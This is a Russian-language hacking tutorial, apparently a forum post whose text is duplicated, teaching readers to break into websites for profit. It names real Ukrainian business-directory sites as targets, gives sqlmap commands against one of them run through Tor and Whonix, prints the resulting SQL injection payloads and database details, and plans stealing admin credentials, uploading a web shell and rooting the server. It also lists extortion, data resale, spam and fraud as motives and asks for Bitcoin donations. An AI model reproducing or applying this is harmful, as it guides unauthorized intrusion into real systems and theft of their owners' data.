Привет, ребятки!
В этом цикле статей я поведаю вам о том, как мочить терриристов в сортире, упс, взламывать сайты, тырить корпоративные секреты и все такое.
Все примеры будут проведены на реальных сайтах, владельцы которых и не будут подозревать о том что их взламывают в прямом мать вашу эфире.
Итак, для чего ломать сайты?
Епать, вы этого не знаете? :D
Ладно, пох, расскажу.
Давно давно, когда на слуху были еще карточки интернет доступа, модем в 56кб/с и бесплатный интернет в ночное время, сайты взламывали чтобы поприкалываться.
Разместить картинку с письками женского рода - это был верх совершенства. А еще были войны между различными группировками, когда Зайцы Запада ломали сайты Драконов Востока.
Но потом в инете стали зарабатывать бабло, появились первые интернет магазины и пошло поехало.
Итак, сайты ломают для:
- У меня писун больше, чем у тебя, вот тебе по сайту куем или говоря нормальным языком - дефейс. Практически мертвый вариант. Помните как раньше многие ресурсы по сетевой безопасности держали ленту взломанных дефейснутых ресурсов? Конечно, сайты взламывают чтобы сделать дефейс, но обычно это происходит с ресурсами которые отражают неправильную политику партии
- взлом с целью кражи конфине, конфици, конфедци, пля, секретной информации. Есть фирма, есть сайт, есть локальная сеть конторы - задача, проникнуть, вытащить нужную информацию, предоставить заказчику. Делается строго по заказу. Редко, когда обычный хакер, ломает контору, чтобы потом полученные данные скормить конкурентам. Ибо пля рискованный и энергозатратный вариант. Без подготовки (а на это нужны бабки) никуда.
- взлом с целью установления контроля над сервером. Цель: поставить VPN, использовать для брута или рассылки спама, для проведения других взломов и т.д.
- взлом с целью получения бабла:
-- если посещаемый ресурс, установка сплоит пака и в дальнейшем продажа загрузок или слив трафика
-- если сайт продает что то информационное, то получение этой информации и дальнейшая перепродажа на черном рынке
-- если сайт приносит бабло владельцам, то блокировка сайта с требованием бабла за типо анализ безопасности веб проекта
-- если это интернет магазин, то мошеничество против клиентов или атака против интернет магазина (оплата на левые кошельки по заказам клиентов)
- взлом как месть: пи*дец дебильный вариант, но имеет право быть. Дебильный потому что норм сайт восстанавливается из бэкапа. Единственный вариант, это ломать мыло админа, получать доступ к хостингу. В этом случае, хозяин будет несколько дольше восстанавливать доступ к ресурсу.
- легальные взломы. Ну это типо когда по заказу владельца проекта осуществляется взлом с целью установления дыр и их дальнейшее закрытие
Короче в общих чертах сайт ломают или для получения контроля (для неких плюшек) или для получения бабла (в разных вариациях)
С этой куйней разобрались, поехали дальше.
Чтобы ломать сайты и проникать во все жопы, эм, дыры, нужно настроить безопасное окружение.
Идея пля проста и понятна и хочу чтобы вы запомнили и выбили эту мысль себе татуировкой на пятой точке.
Вы используете обычные интернет для ваших обычных повседневных действий. Смотрите порнушку, дро*ите на картинки, зависаете в социальных сетях. Даже если вы хотите почитать статью о новых дырах в вордпресе, вы не делаете этого через нормальный повседневный интернет. Вбейте это себе в башку.
Вы используете анонимный интернет для всех темных дел и для чтения всей сопутствующей документации.
Ну погнали, кролики
Настраиваем анонимное окружение
Первым делом берем Трукрипт отсюда https://truecrypt.ch/downloads/ - не боись, это норм версия
Вторым качаем два образа Whonix отсюда https://www.whonix.org/wiki/Download#Install_Whonix, Gateway и Workstation
Это система на основе Debian для анонимного серфинга и работы в интернете. Все соединения из Workstation идут на Gateway, которые в свою очередь сыплются через ТОР. Не суть важно, запускаете вы SqlMap или Nmap - все соединения через ТОР.
Итак, создаем зашифрованный раздел, примерно 10-12 гигов.
Качаем и ставим VirtualBox. Запускаем и импортируем первый образ Whonix Gateway. Все оставляем как есть, кроме месторасположения файла с виртуальной машиной (указываете путь на ваш зашифрованный диск). Точно также импортируем и второй образ Whonix Workstation (именно на нем вы и будете работать).
Вы должны уметь и понимать работу в линукс подобных системах, это мануал не об этом. И здесь я ни слова обучающего не скажу о линукс.
Запускаем Gateway, ждем когда установиться и настроиться, пройдет все проверки. Затем запускаем Workstation.
Ну типа все. У нас есть готовая дебиан система на зашифрованном диске, с которой мы будем мочить сайты.
Конечно с этой системы вы можете ломать сайты, проникать в корпоративные сети, но лучше сделать так:
- взломать какой нить сервер, установить контроль, поставить туда нужный софт и доступ к этому серверу осуществлять с Whonix'а
Т.е. Whonix используем для доступа к взломанному серверу, с которого уже ломаем все остальные.
Ну че, приступим к взлому?
А х*ли ждать
Кого будем ломать?
Наткнулся я тут на сайт, который продает информационные базы biz-gid.com (он же business-guide.com.ua). Базы предприятий Украины. Короткий анализ выдал, что сайт входит в группу порталов (все связаны с продажей информационных баз наивным клиентам и оказанием услуг, типа сео и все такое).
Итак наши цели быстро определились
ua-region.info (ua-region.com.ua)
dlab.com.ua
databases.com.ua
biz-gid.com (.ru, business-guide.com.ua)
Наша цель не состояла в том, чтобы проникнуть в локальную сеть предприятия. Нам нужен только контроль над сервером или серверами.
Поэтому идем в гугл и пишем что нить в таком роде inurl:.php? site:biz-gid.com
Такой запрос найдет нам все скрипты с параметрами на сайте biz-gid.com
Линки проверяем вручную, тупо подставляя различные спецсимволы, в первую очередь ' и смотрим на реакцию сервера. Если выдает ошибку или возвращает страницу отличную от вывода с правильным параметром, загоняем урл в sqlmap
Что такое sqlmap - это тулза для автоматизации скул иньекций.
К сожалению, на биз гиде стоял mod_rewrite и все пхп скрипты были спрятаны и реврайтились сервером. Поэтому пришлось оставить гугл и вручную смотреть сайт. Очень очень скоро находим линк типа biz-gid.com/about/articles_bg?id=76
Пишем в параметр кавычку, получилось так biz-gid.com/about/articles_bg?id=76' и видим пустую страницу.
Вуаля, есть вектор для атаки.
Загоняем в SQLMAP (sqlmap: automatic SQL injection and database takeover tool)
python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables
Этот запрос делаем из Whonix.
Если запускает sqlmap просто с компа с установленным тором, тогда запрос такой
python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables --tor --check-tor --tor-port 9150 --tor-type SOCKS5
О параметрах скулмапа читайте сами в мануале на сайте.
После сканирования получаем ответ
Йохуууу. У нас есть доступ к базе данных. Осталось за малым найти админку, логин и пароль админа, закачать шелл и рутнуть сервак...
Ну что писать продолжение? Интересная тема?
Пишите, что вы боялись спросить, но хотели бы узнать.
Ах, да, чуть не забыл. Авторство мое, но вы можете использовать весь цикл статей по своему усмотрению. Выдавать его за свой, получать с лохов бабло за обучение и все такое.
Пожертвования слать на кошелек биткоин 161LNBVTzVTZKq95E4dX7M4i3yVxHdndGS
Если данный цикл статей вам помог и оказался полезным или вы успешно стали ломать и получать бабло с сайтов, но ни одного битка не отправили мне, автору, этого глобального опуса, пусть пля удача от вас отвернется и карма засорится, а отдел К отрежет вам яйца...
Всё! До следующих встреч...
В этом цикле статей я поведаю вам о том, как мочить терриристов в сортире, упс, взламывать сайты, тырить корпоративные секреты и все такое.
Все примеры будут проведены на реальных сайтах, владельцы которых и не будут подозревать о том что их взламывают в прямом мать вашу эфире.
Итак, для чего ломать сайты?
Епать, вы этого не знаете? :D
Ладно, пох, расскажу.
Давно давно, когда на слуху были еще карточки интернет доступа, модем в 56кб/с и бесплатный интернет в ночное время, сайты взламывали чтобы поприкалываться.
Разместить картинку с письками женского рода - это был верх совершенства. А еще были войны между различными группировками, когда Зайцы Запада ломали сайты Драконов Востока.
Но потом в инете стали зарабатывать бабло, появились первые интернет магазины и пошло поехало.
Итак, сайты ломают для:
- У меня писун больше, чем у тебя, вот тебе по сайту куем или говоря нормальным языком - дефейс. Практически мертвый вариант. Помните как раньше многие ресурсы по сетевой безопасности держали ленту взломанных дефейснутых ресурсов? Конечно, сайты взламывают чтобы сделать дефейс, но обычно это происходит с ресурсами которые отражают неправильную политику партии
- взлом с целью кражи конфине, конфици, конфедци, пля, секретной информации. Есть фирма, есть сайт, есть локальная сеть конторы - задача, проникнуть, вытащить нужную информацию, предоставить заказчику. Делается строго по заказу. Редко, когда обычный хакер, ломает контору, чтобы потом полученные данные скормить конкурентам. Ибо пля рискованный и энергозатратный вариант. Без подготовки (а на это нужны бабки) никуда.
- взлом с целью установления контроля над сервером. Цель: поставить VPN, использовать для брута или рассылки спама, для проведения других взломов и т.д.
- взлом с целью получения бабла:
-- если посещаемый ресурс, установка сплоит пака и в дальнейшем продажа загрузок или слив трафика
-- если сайт продает что то информационное, то получение этой информации и дальнейшая перепродажа на черном рынке
-- если сайт приносит бабло владельцам, то блокировка сайта с требованием бабла за типо анализ безопасности веб проекта
-- если это интернет магазин, то мошеничество против клиентов или атака против интернет магазина (оплата на левые кошельки по заказам клиентов)
- взлом как месть: пи*дец дебильный вариант, но имеет право быть. Дебильный потому что норм сайт восстанавливается из бэкапа. Единственный вариант, это ломать мыло админа, получать доступ к хостингу. В этом случае, хозяин будет несколько дольше восстанавливать доступ к ресурсу.
- легальные взломы. Ну это типо когда по заказу владельца проекта осуществляется взлом с целью установления дыр и их дальнейшее закрытие
Короче в общих чертах сайт ломают или для получения контроля (для неких плюшек) или для получения бабла (в разных вариациях)
С этой куйней разобрались, поехали дальше.
Чтобы ломать сайты и проникать во все жопы, эм, дыры, нужно настроить безопасное окружение.
Идея пля проста и понятна и хочу чтобы вы запомнили и выбили эту мысль себе татуировкой на пятой точке.
Вы используете обычные интернет для ваших обычных повседневных действий. Смотрите порнушку, дро*ите на картинки, зависаете в социальных сетях. Даже если вы хотите почитать статью о новых дырах в вордпресе, вы не делаете этого через нормальный повседневный интернет. Вбейте это себе в башку.
Вы используете анонимный интернет для всех темных дел и для чтения всей сопутствующей документации.
Ну погнали, кролики
Настраиваем анонимное окружение
Первым делом берем Трукрипт отсюда https://truecrypt.ch/downloads/ - не боись, это норм версия
Вторым качаем два образа Whonix отсюда https://www.whonix.org/wiki/Download#Install_Whonix, Gateway и Workstation
Это система на основе Debian для анонимного серфинга и работы в интернете. Все соединения из Workstation идут на Gateway, которые в свою очередь сыплются через ТОР. Не суть важно, запускаете вы SqlMap или Nmap - все соединения через ТОР.
Итак, создаем зашифрованный раздел, примерно 10-12 гигов.
Качаем и ставим VirtualBox. Запускаем и импортируем первый образ Whonix Gateway. Все оставляем как есть, кроме месторасположения файла с виртуальной машиной (указываете путь на ваш зашифрованный диск). Точно также импортируем и второй образ Whonix Workstation (именно на нем вы и будете работать).
Вы должны уметь и понимать работу в линукс подобных системах, это мануал не об этом. И здесь я ни слова обучающего не скажу о линукс.
Запускаем Gateway, ждем когда установиться и настроиться, пройдет все проверки. Затем запускаем Workstation.
Ну типа все. У нас есть готовая дебиан система на зашифрованном диске, с которой мы будем мочить сайты.
Конечно с этой системы вы можете ломать сайты, проникать в корпоративные сети, но лучше сделать так:
- взломать какой нить сервер, установить контроль, поставить туда нужный софт и доступ к этому серверу осуществлять с Whonix'а
Т.е. Whonix используем для доступа к взломанному серверу, с которого уже ломаем все остальные.
Ну че, приступим к взлому?
А х*ли ждать
Кого будем ломать?
Наткнулся я тут на сайт, который продает информационные базы biz-gid.com (он же business-guide.com.ua). Базы предприятий Украины. Короткий анализ выдал, что сайт входит в группу порталов (все связаны с продажей информационных баз наивным клиентам и оказанием услуг, типа сео и все такое).
Итак наши цели быстро определились
ua-region.info (ua-region.com.ua)
dlab.com.ua
databases.com.ua
biz-gid.com (.ru, business-guide.com.ua)
Наша цель не состояла в том, чтобы проникнуть в локальную сеть предприятия. Нам нужен только контроль над сервером или серверами.
Поэтому идем в гугл и пишем что нить в таком роде inurl:.php? site:biz-gid.com
Такой запрос найдет нам все скрипты с параметрами на сайте biz-gid.com
Линки проверяем вручную, тупо подставляя различные спецсимволы, в первую очередь ' и смотрим на реакцию сервера. Если выдает ошибку или возвращает страницу отличную от вывода с правильным параметром, загоняем урл в sqlmap
Что такое sqlmap - это тулза для автоматизации скул иньекций.
К сожалению, на биз гиде стоял mod_rewrite и все пхп скрипты были спрятаны и реврайтились сервером. Поэтому пришлось оставить гугл и вручную смотреть сайт. Очень очень скоро находим линк типа biz-gid.com/about/articles_bg?id=76
Пишем в параметр кавычку, получилось так biz-gid.com/about/articles_bg?id=76' и видим пустую страницу.
Вуаля, есть вектор для атаки.
Загоняем в SQLMAP (sqlmap: automatic SQL injection and database takeover tool)
python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables
Этот запрос делаем из Whonix.
Если запускает sqlmap просто с компа с установленным тором, тогда запрос такой
python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables --tor --check-tor --tor-port 9150 --tor-type SOCKS5
О параметрах скулмапа читайте сами в мануале на сайте.
После сканирования получаем ответ
Код:
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=73 AND 3669=3669
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=-8581 UNION ALL SELECT NULL,NULL,CONCAT(0x7164776b71,0x4447436e417a6a6a476e,0x7172756c71),NULL#
---
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=73 AND 3669=3669
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=-8581 UNION ALL SELECT NULL,NULL,CONCAT(0x7164776b71,0x4447436e417a6a6a476e,0x7172756c71),NULL#
---
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL 5
banner: '5.5.20-log'
current user: 'bg@%'
current database: 'bg'
available databases [4]:
[*] bg
[*] information_schema
[*] kievmap
[*] meccano
Йохуууу. У нас есть доступ к базе данных. Осталось за малым найти админку, логин и пароль админа, закачать шелл и рутнуть сервак...
Ну что писать продолжение? Интересная тема?
Пишите, что вы боялись спросить, но хотели бы узнать.
Ах, да, чуть не забыл. Авторство мое, но вы можете использовать весь цикл статей по своему усмотрению. Выдавать его за свой, получать с лохов бабло за обучение и все такое.
Пожертвования слать на кошелек биткоин 161LNBVTzVTZKq95E4dX7M4i3yVxHdndGS
Если данный цикл статей вам помог и оказался полезным или вы успешно стали ломать и получать бабло с сайтов, но ни одного битка не отправили мне, автору, этого глобального опуса, пусть пля удача от вас отвернется и карма засорится, а отдел К отрежет вам яйца...
Всё! До следующих встреч...